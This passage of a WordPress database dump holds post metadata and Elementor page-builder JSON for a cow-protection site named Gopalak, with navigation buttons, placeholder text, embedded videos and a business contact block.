";a:5:{s:4:\"file\";s:20:\"GOPALAK555-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1337;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9185,403,'_oembed_c3616ec0612ef706abbccdd4b4e5dcbd','<iframe title=\"Dramatic rescue of injured calf from garbage dump in India.\" width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/sVQg0-3WSc4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(9186,403,'_oembed_time_c3616ec0612ef706abbccdd4b4e5dcbd','1665403654'),(9195,1582,'_elementor_edit_mode','builder'),(9196,1582,'_elementor_template_type','wp-page'),(9197,1582,'_elementor_version','3.7.8'),(9198,1582,'_wp_page_template','elementor_canvas'),(9199,1582,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9200,1582,'_elementor_page_assets','a:0:{}'),(9202,1583,'_elementor_edit_mode','builder'),(9203,1583,'_elementor_template_type','wp-page'),(9204,1583,'_elementor_version','3.7.8'),(9205,1583,'_wp_page_template','elementor_canvas'),(9206,1583,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive 